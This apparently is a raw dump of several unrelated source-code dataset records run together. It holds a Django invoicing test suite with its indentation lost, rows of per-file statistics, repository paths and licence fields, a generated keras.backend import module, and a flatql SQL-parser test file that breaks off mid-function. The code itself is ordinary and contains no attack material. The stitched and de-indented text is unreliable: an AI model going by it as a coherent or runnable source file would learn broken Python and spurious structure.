from money.models import Money, Price, Currency
from customer_invoicing.models import ReceiptCustInvoice, CustInvoice, CustomCustInvoice, CustomInvoiceLine, \
CustPayment, InvoiceFieldPerson, InvoiceFieldOrganisation
from crm.models import PersonTypeField, PersonTypeFieldValue, PersonType, OrganisationTypeField, \
OrganisationTypeFieldValue, OrganisationType
from decimal import Decimal
from swipe.settings import USED_CURRENCY
# noinspection PyTypeChecker
class CustInvoiceTestReceiptInvoice(TestCase, TestData):
def setUp(self):
self.setup_base_data()
def test_create_invoice_without_customer(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 3
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
tl_1 = SalesTransactionLine(price=self.price_system_currency_1, count=SOLD, order=order.pk,
article=self.articletype_1)
money_1 = Money(amount=self.price_system_currency_1.amount * SOLD,
currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
with self.assertRaises(IncorrectDataException):
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1], customer=None)
def test_create_invoice_from_transaction_all_invoiced(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 3
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
tl_1 = SalesTransactionLine(price=self.price_system_currency_1, count=SOLD, order=order.pk,
article=self.articletype_1)
money_1 = Money(amount=self.price_system_currency_1.amount * SOLD, currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1], customer=self.customer_person_1)
trans = Transaction.objects.get()
self.assertEqual(len(CustInvoice.objects.all()), 1)
receipt_cust_invoice = ReceiptCustInvoice.objects.get()
self.assertEqual(receipt_cust_invoice.receipt, trans)
self.assertEqual(receipt_cust_invoice.paid, Money(amount=Decimal(0), currency=self.currency_current))
self.assertEqual(receipt_cust_invoice.to_be_paid, money_1)
self.assertFalse(receipt_cust_invoice.handled)
def test_create_invoice_no_invoicing(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
# Maestro register
self.register_3.open(counted_amount=Decimal(0))
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
SOLD = 1
tl_1 = SalesTransactionLine(price=self.price_system_currency_1, count=SOLD, order=order.pk,
article=self.articletype_1)
money_1 = Money(amount=self.price_system_currency_1.amount * SOLD, currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_maestro)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1], customer=self.customer_person_1)
self.assertFalse(CustInvoice.objects.exists())
def test_create_invoice_mixed_invoice_and_straight_payment(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
# Maestro register
self.register_3.open(counted_amount=Decimal(0))
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
SOLD = 1
price = Price(amount=Decimal("3"), currency=self.currency_current, vat=1)
tl_1 = SalesTransactionLine(price=price, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=Decimal("1"), currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_maestro)
money_2 = Money(amount=Decimal("2"), currency=self.price_system_currency_1.currency)
pymnt_2 = Payment(amount=money_2, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1],
payments=[pymnt_1, pymnt_2], customer=self.customer_person_1)
trans = Transaction.objects.get()
self.assertEqual(len(CustInvoice.objects.all()), 1)
receipt_cust_invoice = ReceiptCustInvoice.objects.get()
self.assertEqual(receipt_cust_invoice.receipt, trans)
self.assertEqual(receipt_cust_invoice.paid, Money(amount=Decimal("1"), currency=self.currency_current))
self.assertEqual(receipt_cust_invoice.to_be_paid, Money(amount=Decimal("3"), currency=self.currency_current))
self.assertFalse(receipt_cust_invoice.handled)
class CustInvoiceTestCustomInvoice(TestCase, TestData):
def setUp(self):
self.setup_base_data()
def test_create_custom_invoice(self):
invoice_lines = [["USB kabels", self.price_system_currency_1], ["Poolse schoonmaakmiddelen", self.price_systen_currency_2]]
CustomCustInvoice.create_custom_invoice(invoice_name="Jaap de Steen", invoice_address="Hallenweg 5",
invoice_zip_code="7522NB", invoice_city="Enschede",
invoice_country="Nederland",
invoice_email_address="bestuuur@iapc.utwente.nl",
text_price_combinations=invoice_lines,
user=self.user_1)
self.assertEqual(len(CustInvoice.objects.all()), 1)
custom_invoice = CustomCustInvoice.objects.get()
self.assertEqual(custom_invoice.paid, Money(amount=Decimal("0"), currency=self.currency_current))
self.assertEqual(custom_invoice.to_be_paid, Money(amount=self.price_system_currency_1.amount + self.price_systen_currency_2.amount,
currency=self.currency_current))
self.assertFalse(custom_invoice.handled)
custom_invoice_lines = CustomInvoiceLine.objects.all()
self.assertEqual(len(custom_invoice_lines), 2)
if custom_invoice_lines[0].price.amount == self.price_system_currency_1.amount:
self.assertTrue(custom_invoice_lines[1].price.amount == self.price_systen_currency_2.amount)
else:
self.assertEquals(custom_invoice_lines[0].price.amount, self.price_systen_currency_2.amount)
self.assertEquals(custom_invoice_lines[1].price.amount, self.price_system_currency_1.amount)
for line in custom_invoice_lines:
self.assertEqual(line.custom_invoice, custom_invoice)
def test_create_custom_invoice_free(self):
price = Price(amount=Decimal(0), currency=self.currency_eur, vat=1)
invoice_lines = [["Poolse schoonmaakmiddelen", price]]
CustomCustInvoice.create_custom_invoice(invoice_name="Jaap de Steen", invoice_address="Hallenweg 5",
invoice_zip_code="7522NB", invoice_city="Enschede",
invoice_country="Nederland",
invoice_email_address="bestuuur@iapc.utwente.nl",
text_price_combinations=invoice_lines,
user=self.user_1)
self.assertEqual(len(CustInvoice.objects.all()), 1)
custom_invoice = CustomCustInvoice.objects.get()
self.assertTrue(custom_invoice.handled)
# noinspection PyTypeChecker
class CustInvoicePayments(TestCase, TestData):
def setUp(self):
self.setup_base_data()
self.current_currency = Currency(USED_CURRENCY)
def test_payment_all_invoiced_all_paid(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
tl_1 = SalesTransactionLine(price=self.price_system_currency_1, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=self.price_system_currency_1.amount * SOLD, currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1], customer=self.customer_person_1)
receipt_cust_invoice = ReceiptCustInvoice.objects.get()
self.assertFalse(receipt_cust_invoice.handled)
receipt_cust_invoice.pay(Money(amount=self.price_system_currency_1.amount, currency=self.current_currency), self.user_1)
self.assertTrue(receipt_cust_invoice.handled)
def test_payments_all_invoice_partial_payment_too_little(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
tl_1 = SalesTransactionLine(price=self.price_system_currency_1, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=self.price_system_currency_1.amount * SOLD, currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1], customer=self.customer_person_1)
receipt_cust_invoice = ReceiptCustInvoice.objects.get()
self.assertFalse(receipt_cust_invoice.handled)
receipt_cust_invoice.pay(Money(amount=Decimal("1"), currency=self.current_currency), self.user_1)
self.assertFalse(receipt_cust_invoice.handled)
def test_payments_all_invoice_partial_payment_too_much(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
tl_1 = SalesTransactionLine(price=self.price_system_currency_1, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=self.price_system_currency_1.amount * SOLD, currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1], customer=self.customer_person_1)
receipt_cust_invoice = ReceiptCustInvoice.objects.get()
self.assertFalse(receipt_cust_invoice.handled)
receipt_cust_invoice.pay(Money(amount=Decimal("2"), currency=self.current_currency), self.user_1)
self.assertFalse(receipt_cust_invoice.handled)
def test_payments_partial_invoice(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
# Maestro register
self.register_3.open(counted_amount=Decimal(0))
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
SOLD = 1
price = Price(amount=Decimal("3"), currency=self.currency_current, vat=1)
tl_1 = SalesTransactionLine(price=price, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=Decimal("1"), currency=self.current_currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_maestro)
money_2 = Money(amount=Decimal("2"), currency=self.current_currency)
pymnt_2 = Payment(amount=money_2, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1, pymnt_2],
customer=self.customer_person_1)
receipt_invoice = ReceiptCustInvoice.objects.get()
self.assertFalse(receipt_invoice.handled)
receipt_invoice.pay(money_2, self.user_1)
self.assertTrue(receipt_invoice.handled)
def test_payments_two_payments(self):
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
price = Price(amount=Decimal("2"), currency=self.currency_current, vat=1)
tl_1 = SalesTransactionLine(price=price, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=Decimal("2"), currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1], customer=self.customer_person_1)
receipt_cust_invoice = ReceiptCustInvoice.objects.get()
self.assertFalse(receipt_cust_invoice.handled)
receipt_cust_invoice.pay(Money(amount=Decimal("1"), currency=self.currency_current), self.user_1)
self.assertFalse(receipt_cust_invoice.handled)
receipt_cust_invoice.pay(Money(amount=Decimal("1"), currency=self.currency_current), self.user_1)
self.assertTrue(receipt_cust_invoice.handled)
self.assertEqual(len(CustPayment.objects.all()), 2)
class InvoiceFieldTests(TestCase, TestData):
def setUp(self):
self.setup_base_data()
def test_get_fields_for_customer_passes_through(self):
# Lots of experimental typefield data
ptf = PersonTypeField.objects.create(name="FooPersonTypeFieldName")
ptf2 = PersonTypeField.objects.create(name="BarPersonTypeFieldName")
pt = PersonType.objects.create(name="FooPersonTypeName")
pt.typefields.add(ptf)
pt.typefields.add(ptf2)
self.customer_person_1.types.add(pt)
ptfv = PersonTypeFieldValue(value="InvoiceName", typefield=ptf, type=pt, object=self.customer_person_1)
ptfv.save()
ptfv2 = PersonTypeFieldValue(value="InvoiceName", typefield=ptf2, type=pt, object=self.customer_person_1)
ptfv2.save()
# Create a receipt with relevant customer
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
# Invoice register
self.register_4.open(counted_amount=Decimal(0))
price = Price(amount=Decimal("2"), currency=self.currency_current, vat=1)
tl_1 = SalesTransactionLine(price=price, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=Decimal("2"), currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1],
customer=self.customer_person_1)
self.assertTrue(InvoiceFieldPerson.objects.get().is_dummy())
def test_get_fields_for_customers_person_sets_name(self):
ptf = PersonTypeField.objects.create(name="FooPersonTypeFieldName")
ptf2 = PersonTypeField.objects.create(name="BarPersonTypeFieldName")
ptf3 = PersonTypeField.objects.create(name="BazPersonTypeFieldCity")
pt = PersonType.objects.create(name="FooPersonTypeName")
pt.typefields.add(ptf)
pt.typefields.add(ptf2)
self.customer_person_1.types.add(pt)
VAR_NAME = "Magnus"
VAR_CITY = "Ulaan Bator"
ptfv = PersonTypeFieldValue(value=VAR_NAME, typefield=ptf, type=pt, object=self.customer_person_1)
ptfv.save()
ptfv2 = PersonTypeFieldValue(value="Irr data", typefield=ptf2, type=pt, object=self.customer_person_1)
ptfv2.save()
ptfv3 = PersonTypeFieldValue(value=VAR_CITY, typefield=ptf3, type=pt, object=self.customer_person_1)
ptfv3.save()
InvoiceFieldPerson.objects.create(name=ptf, city=ptf3)
# Some buying data
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
self.register_4.open(counted_amount=Decimal(0))
price = Price(amount=Decimal("2"), currency=self.currency_current, vat=1)
tl_1 = SalesTransactionLine(price=price, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=Decimal("2"), currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1],
customer=self.customer_person_1)
rec = ReceiptCustInvoice.objects.get()
self.assertEqual(rec.invoice_name, VAR_NAME)
self.assertEqual(rec.invoice_city, VAR_CITY)
def test_get_fields_for_customers_organisation_sets_name(self):
# Same as test above, but with organisation
ptf = OrganisationTypeField.objects.create(name="FooPersonTypeFieldName")
ptf2 = OrganisationTypeField.objects.create(name="BarPersonTypeFieldName")
ptf3 = OrganisationTypeField.objects.create(name="BazPersonTypeFieldCity")
pt = OrganisationType.objects.create(name="FooPersonTypeName")
pt.typefields.add(ptf)
pt.typefields.add(ptf2)
self.organisation.types.add(pt)
VAR_NAME = "Magnus"
VAR_CITY = "Ulaan Bator"
ptfv = OrganisationTypeFieldValue(value=VAR_NAME, typefield=ptf, type=pt, object=self.organisation)
ptfv.save()
ptfv2 = OrganisationTypeFieldValue(value="Irr data", typefield=ptf2, type=pt, object=self.organisation)
ptfv2.save()
ptfv3 = OrganisationTypeFieldValue(value=VAR_CITY, typefield=ptf3, type=pt, object=self.organisation)
ptfv3.save()
InvoiceFieldOrganisation.objects.create(name=ptf, city=ptf3)
# Some buying data
order = self.create_custorders()
self.create_suporders()
self.create_packingdocuments()
SOLD = 1
self.register_4.open(counted_amount=Decimal(0))
price = Price(amount=Decimal("2"), currency=self.currency_current, vat=1)
tl_1 = SalesTransactionLine(price=price, count=SOLD, order=order.id,
article=self.articletype_1)
money_1 = Money(amount=Decimal("2"), currency=self.price_system_currency_1.currency)
pymnt_1 = Payment(amount=money_1, payment_type=self.paymenttype_invoice)
Transaction.create_transaction(user=self.user_1, transaction_lines=[tl_1], payments=[pymnt_1],
customer=self.customer_contact_organisation)
rec = ReceiptCustInvoice.objects.get()
self.assertEqual(rec.invoice_name, VAR_NAME)
self.assertEqual(rec.invoice_city, VAR_CITY)
| 54.709945
| 139
| 0.69235
| 2,261
| 19,805
| 5.797435
| 0.084918
| 0.037687
| 0.033186
| 0.050885
| 0.84437
| 0.816448
| 0.799359
| 0.788755
| 0.761215
| 0.735734
| 0
| 0.018039
| 0.213481
| 19,805
| 361
| 140
| 54.861496
| 0.823458
| 0.02151
| 0
| 0.703704
| 0
| 0
| 0.026966
| 0.011571
| 0
| 0
| 0
| 0
| 0.13468
| 1
| 0.060606
| false
| 0.003367
| 0.026936
| 0
| 0.10101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f14569931cfd994f6e73b4959b1254ca180fc464
| 6,045
|
py
|
Python
|
venv/lib/python3.8/site-packages/keras/api/_v1/keras/backend/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/keras/api/keras/backend/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/keras/api/keras/backend/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.keras.backend namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from keras.backend import _v1_name_scope as name_scope
from keras.backend import abs
from keras.backend import all
from keras.backend import any
from keras.backend import arange
from keras.backend import argmax
from keras.backend import argmin
from keras.backend import backend
from keras.backend import batch_dot
from keras.backend import batch_flatten
from keras.backend import batch_get_value
from keras.backend import batch_normalization
from keras.backend import batch_set_value
from keras.backend import bias_add
from keras.backend import binary_crossentropy
from keras.backend import cast
from keras.backend import cast_to_floatx
from keras.backend import categorical_crossentropy
from keras.backend import clear_session
from keras.backend import clip
from keras.backend import concatenate
from keras.backend import constant
from keras.backend import conv1d
from keras.backend import conv2d
from keras.backend import conv2d_transpose
from keras.backend import conv3d
from keras.backend import cos
from keras.backend import count_params
from keras.backend import ctc_batch_cost
from keras.backend import ctc_decode
from keras.backend import ctc_label_dense_to_sparse
from keras.backend import cumprod
from keras.backend import cumsum
from keras.backend import depthwise_conv2d
from keras.backend import dot
from keras.backend import dropout
from keras.backend import dtype
from keras.backend import elu
from keras.backend import equal
from keras.backend import eval
from keras.backend import exp
from keras.backend import expand_dims
from keras.backend import eye
from keras.backend import flatten
from keras.backend import foldl
from keras.backend import foldr
from keras.backend import function
from keras.backend import gather
from keras.backend import get_session
from keras.backend import get_uid
from keras.backend import get_value
from keras.backend import gradients
from keras.backend import greater
from keras.backend import greater_equal
from keras.backend import hard_sigmoid
from keras.backend import in_test_phase
from keras.backend import in_top_k
from keras.backend import in_train_phase
from keras.backend import int_shape
from keras.backend import is_keras_tensor
from keras.backend import is_sparse
from keras.backend import l2_normalize
from keras.backend import learning_phase
from keras.backend import learning_phase_scope
from keras.backend import less
from keras.backend import less_equal
from keras.backend import local_conv1d
from keras.backend import local_conv2d
from keras.backend import log
from keras.backend import manual_variable_initialization
from keras.backend import map_fn
from keras.backend import max
from keras.backend import maximum
from keras.backend import mean
from keras.backend import min
from keras.backend import minimum
from keras.backend import moving_average_update
from keras.backend import ndim
from keras.backend import normalize_batch_in_training
from keras.backend import not_equal
from keras.backend import one_hot
from keras.backend import ones
from keras.backend import ones_like
from keras.backend import permute_dimensions
from keras.backend import placeholder
from keras.backend import pool2d
from keras.backend import pool3d
from keras.backend import pow
from keras.backend import print_tensor
from keras.backend import prod
from keras.backend import random_bernoulli
from keras.backend import random_binomial
from keras.backend import random_normal
from keras.backend import random_normal_variable
from keras.backend import random_uniform
from keras.backend import random_uniform_variable
from keras.backend import relu
from keras.backend import repeat
from keras.backend import repeat_elements
from keras.backend import reset_uids
from keras.backend import reshape
from keras.backend import resize_images
from keras.backend import resize_volumes
from keras.backend import reverse
from keras.backend import rnn
from keras.backend import round
from keras.backend import separable_conv2d
from keras.backend import set_learning_phase
from keras.backend import set_session
from keras.backend import set_value
from keras.backend import shape
from keras.backend import sigmoid
from keras.backend import sign
from keras.backend import sin
from keras.backend import softmax
from keras.backend import softplus
from keras.backend import softsign
from keras.backend import sparse_categorical_crossentropy
from keras.backend import spatial_2d_padding
from keras.backend import spatial_3d_padding
from keras.backend import sqrt
from keras.backend import square
from keras.backend import squeeze
from keras.backend import stack
from keras.backend import std
from keras.backend import stop_gradient
from keras.backend import sum
from keras.backend import switch
from keras.backend import tanh
from keras.backend import temporal_padding
from keras.backend import tile
from keras.backend import to_dense
from keras.backend import transpose
from keras.backend import truncated_normal
from keras.backend import update
from keras.backend import update_add
from keras.backend import update_sub
from keras.backend import var
from keras.backend import variable
from keras.backend import zeros
from keras.backend import zeros_like
from keras.backend_config import epsilon
from keras.backend_config import floatx
from keras.backend_config import image_data_format
from keras.backend_config import set_epsilon
from keras.backend_config import set_floatx
from keras.backend_config import set_image_data_format
del _print_function
from tensorflow.python.util import module_wrapper as _module_wrapper
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
_sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
_sys.modules[__name__], "keras.backend", public_apis=None, deprecation=True,
has_lite=False)
| 36.415663
| 82
| 0.858065
| 922
| 6,045
| 5.4718
| 0.212581
| 0.35441
| 0.466204
| 0.614866
| 0.512587
| 0.143905
| 0.019425
| 0.019425
| 0.019425
| 0
| 0
| 0.0026
| 0.109181
| 6,045
| 165
| 83
| 36.636364
| 0.934262
| 0.027957
| 0
| 0
| 1
| 0
| 0.002215
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.967742
| 0
| 0.967742
| 0.019355
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f16a496e8dfe452b1cf2e5c2aa75e8201dab53d3
| 30,102
|
py
|
Python
|
tests/test_flatql_parser.py
|
Agile-Data/flat-ql
|
3212ae9d0ec4ba822c065bb5e4beccf9e936971b
|
[
"MIT"
] | 3
|
2022-03-21T05:03:39.000Z
|
2022-03-23T01:32:51.000Z
|
tests/test_flatql_parser.py
|
Agile-Data/flat-ql
|
3212ae9d0ec4ba822c065bb5e4beccf9e936971b
|
[
"MIT"
] | null | null | null |
tests/test_flatql_parser.py
|
Agile-Data/flat-ql
|
3212ae9d0ec4ba822c065bb5e4beccf9e936971b
|
[
"MIT"
] | null | null | null |
import pytest
from flatql.parser.ast import FlatQL, QualifiedName, FunctionCall, Comparison, Between, In, IsNull, \
Literal, Like, View, Column, Identifier, Table, BinaryExpression, ParenExpression, CaseExpression, \
LogicalExpression, ArrayLiteral
from flatql.parser.flatql_parser import parse_flatql, parse_qualified_name, parse_join_condition, \
parse_binary_expression
def test_simple_select_syntax():
assert parse_flatql("SELECT table.column FROM table_name") is not None
assert parse_flatql("SELECT table.column AS column_alias FROM table_name") is not None
assert parse_flatql("SELECT table.column AS \"column_alias\" FROM table_name") is not None
assert parse_flatql("SELECT table.column FROM \"select\"") is not None
assert parse_flatql("SELECT table.column, table.column FROM table_name") is not None
assert parse_flatql("SELECT table.column, table.column \n FROM table_name") is not None
assert parse_flatql("SELECT \"table\".\"integer\", table.column \n FROM table_name") is not None
assert parse_flatql("SELECT table.\"select\", table.column \n FROM table_name") is not None
assert parse_flatql("SELECT table.column, count(table.column) FROM table_name") is not None
assert parse_flatql("SELECT table.column, count(table.column) AS column_count FROM table_name") is not None
assert parse_flatql("SELECT table.column, count(table.column) AS \"column_count\" FROM table_name") is not None
assert parse_flatql("SELECT table.column, count_distinct(table.column) FROM table_name") is not None
assert parse_flatql("SELECT table.column, avg(table.column) FROM table_name") is not None
assert parse_flatql("SELECT table.column, sum(table.column) FROM table_name") is not None
assert parse_flatql("SELECT table.column, max(table.column) FROM table_name") is not None
assert parse_flatql("SELECT table.column, min(table.column) FROM table_name") is not None
assert parse_flatql("SELECT table.column, fun(table.column, table.column) FROM table_name") is not None
assert parse_flatql("SELECT table.column, fun(table.column, 10) FROM table_name") is not None
assert parse_flatql("SELECT table.column, fun(table.column, 10, 'a') FROM table_name") is not None
assert parse_flatql("SELECT table.column, count(table) FROM table_name") is not None
assert parse_flatql("SELECT table.column, count(\"table\") FROM table_name") is not None
assert parse_flatql("SELECT 1 + 1 FROM table_name") is not None
assert parse_flatql("SELECT 1 + 1 AS \"binary_alias\" FROM table_name") is not None
assert parse_flatql("SELECT (1 + 1) FROM table_name") is not None
assert parse_flatql("SELECT (1 + 1) AS \"binary_alias\" FROM table_name") is not None
assert parse_flatql("SELECT table.column + 1 FROM table_name") is not None
assert parse_flatql("SELECT table.column + 1 AS \"binary_alias\" FROM table_name") is not None
assert parse_flatql("SELECT table.column + table.column1 FROM table_name") is not None
assert parse_flatql("SELECT table.column + table.column1 AS \"binary_alias\" FROM table_name") is not None
assert parse_flatql("SELECT table.column + table.column1 * 2 / table.column3 AS \"binary_alias\" FROM table_name") is not None
assert parse_flatql("SELECT toYear(table.column) + table.column + 1 FROM table_name") is not None
assert parse_flatql("SELECT toYear(table.column) + count(table.column1) + 1 FROM table_name") is not None
with pytest.raises(SyntaxError):
parse_flatql("SELECT table.column FROM select")
with pytest.raises(SyntaxError):
parse_flatql("SELECT select.column FROM select")
with pytest.raises(SyntaxError):
parse_flatql("SELECT table.column FROM ")
with pytest.raises(SyntaxError):
parse_flatql("SELECT table.column FROM 0table")
with pytest.raises(SyntaxError):
parse_flatql("SELECT table.0column FROM table")
with pytest.raises(SyntaxError):
parse_flatql("SELECT select.integer FROM table")
def test_predicate_syntax():
assert parse_flatql("SELECT table.column FROM \"table_name\" WHERE table.column = 'test'") is not None
assert parse_flatql("SELECT table.column FROM \"table_name\" WHERE table.column = 'test'") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE \"table\".column != 'test'") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE \"from\".\"integer\" = 1") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column = 1.01") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column = -1.01") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column > -1.01") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column < -1.01") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column >= -1.01") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column <= -1.01") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column IS NULL") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE fun(table.column) IS NULL") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column IS NOT NULL") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column IN ('a', 'a')") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column IN (1, 1)") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column IN (1.0, 1.0)") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE fun(table.column) IN (1.0, 1.0)") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column NOT IN (1.0, 1.0)") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column LIKE 'aaa'") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE fun(table.column) LIKE 'aaa'") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column NOT LIKE 'aaa'") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column BETWEEN 1 AND 2") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE fun(table.column) BETWEEN 1 AND 2") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column NOT BETWEEN 1 AND 2") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE count(table.column) > 10") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE count(\"select\".\"integer\") > 10") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.column IN (1.0, 1.0) "
"AND count(table.column) > 10") is not None
assert parse_flatql(
"SELECT table.column FROM table_name WHERE table.column <= -1.01 AND table.column <= -1.01") is not None
assert parse_flatql(
"SELECT table.column FROM table_name WHERE table.column <= -1.01 AND table.column BETWEEN -1.01 AND -1 AND"
" table.column <= -1.01 AND table.column LIKE 'aaa' AND table.column IN ('a', 'a')") is not None
with pytest.raises(SyntaxError):
parse_flatql("SELECT table.column FROM table WHERE select.name = 'abc'")
with pytest.raises(SyntaxError):
parse_flatql("SELECT table.column FROM table WHERE select.name AS table = 'abc'")
def test_order_by_syntax():
assert parse_flatql("SELECT table.column FROM table_name ORDER BY \"table\"") is not None
assert parse_flatql("SELECT table.column FROM table_name WHERE table.name = 'abc'"
" ORDER BY \"table\" DESC, \"table1\" ASC") is not None
assert parse_flatql("SELECT table.column FROM table_name ORDER BY \"table1\" ASC OFFSET 10") is not None
assert parse_flatql("SELECT table.column FROM table_name ORDER BY \"table1\" ASC LIMIT 100 OFFSET 10") is not None
with pytest.raises(SyntaxError):
parse_flatql("SELECT table.column FROM table_name ORDER BY \"table1\" ASC OFFSET 10.0 ")
with pytest.raises(SyntaxError):
parse_flatql("SELECT table.column FROM table_name ORDER BY table.name ASC LIMIT 10 ")
def test_comment_syntax():
assert parse_flatql("/* comment */ SELECT table.column FROM table_name ORDER BY \"abc\"") is not None
assert parse_flatql("-- comment \n SELECT table.column FROM table_name ORDER BY \"abc\"") is not None
with pytest.raises(SyntaxError):
parse_flatql("/* comment * SELECT table.column FROM table_name ORDER BY \"abc\"")
# noinspection PyUnresolvedReferences
def test_projection_parser1():
statement: FlatQL = parse_flatql(
"SELECT \"table\".\"column_1\", "
" table.column_2"
" FROM \"table\"")
assert statement is not None
assert statement.projections is not None
assert len(statement.projections) == 2
assert isinstance(statement.view, View)
assert statement.view.name._value == '"table"'
assert statement.view.name.value() == 'table'
assert isinstance(statement.projections[0], Column)
assert isinstance(statement.projections[1], Column)
assert statement.projections[0].table.name._value == '"table"'
assert statement.projections[0].name._value == '"column_1"'
assert statement.projections[0].table.name.value() == 'table'
assert statement.projections[0].name.value() == 'column_1'
def test_projection_parser2():
